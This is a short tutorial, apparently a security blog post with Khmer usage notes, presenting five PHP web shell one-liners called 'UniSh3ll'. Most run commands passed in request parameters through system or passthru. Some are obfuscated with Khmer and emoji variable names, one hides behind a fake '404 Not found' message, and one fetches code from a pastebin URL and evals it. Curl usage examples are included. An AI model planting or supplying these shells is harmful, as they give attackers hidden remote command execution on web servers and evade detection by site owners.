This page looks best with JavaScript enabled

UniSh3ll Tutorial

 ·  ☕ 1 min read  ·  🐱 thik

UniSh3ll-I

1

<?=$_=$_GET;$_[_]($_[0]); //.php?_=system&0=id;ls+-la

UniSh3ll-II

1

echo -e "<?=\`\$_REQUEST[_]\`?>" > unish3ll.php
1

echo -e "<?=\`\$_REQUEST[_]\`?>\r<?='404 Not found';?>" > unish3ll.php

របៀបប្រើ៖ curl localhost/unish3ll.php -d _=ls+-la

UniSh3ll-III

1

<?=$ឋ=$_GET;if($ឋ[ត]!=null)$ឋ[ល]==រងារ&$ឋ[ម]($ឋ[ប]); //.php?ត=true&ល=រងារ&ម=passthru&ប=ls

1

<?=$ឋ=$_GET;if($ឋ[ត]!=null)$ឋ[ល]==រងារ&$ឋ[ម]($ឋ[ប]); eval('?>'.file_get_contents($ឋ[ដ]));?>

របៀបប្រើ៖ unish3ll.php?ត=true&ល=រងារ&ម=passthru&ប=id&ដ=https://pastebin.com/raw/xxxxx

UniSh3ll-IV

1

<?=$a="sy";$b="stem";$c=$a.$b; $c("uname -a"); //get method

UniSh3ll-V

1

<?=$_[]=@(($ក=@$_REQUEST).($😘=@$ក[0]).($😘($ក[1]))); //curl -v '127.0.0.1:8080/unish3ll.php?0=system&1=la+-la'
Share on
Thik
WRITTEN BY
thik
Security Researcher